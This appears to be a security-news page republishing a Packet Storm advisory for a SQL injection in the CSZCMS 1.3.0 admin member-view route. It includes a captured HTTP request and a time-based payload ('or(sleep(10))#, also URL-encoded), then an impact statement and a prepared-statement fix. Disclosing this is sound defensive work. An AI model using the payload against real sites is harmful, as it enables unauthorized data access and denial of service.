Security
Headlines
HeadlinesLatestCVEs

Headline

CSZCMS 1.3.0 SQL Injection

CSZCMS version 1.3.0 suffers from a remote SQL injection vulnerability in the admin flows.

Packet Storm
#sql#vulnerability#web#windows#linux#dos#apache#git#auth#firefox
# Title:  CSZCMS v1.3.0 - SQL Injection# Author: Abdulaziz Almetairy# Date: 27/01/2024# Vendor: https://www.cszcms.com/# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download# Reference: https://github.com/oh-az# Tested on: Windows 11, MySQL, Apache# 1 - Log in to the admin portalhttp://localhost/cszcms/admin/login# 2 - Navigate to General Menu > Member Users.# 3 Click the 'View' button next to any username.# 4 Intercept the requestGET /cszcms/admin/members/view/1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdssUpgrade-Insecure-Requests: 1# 5 Modify the paramter /cszcms/admin/members/view/1to /cszcms/admin/members/view/'or(sleep(10))#and url encode all characters/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution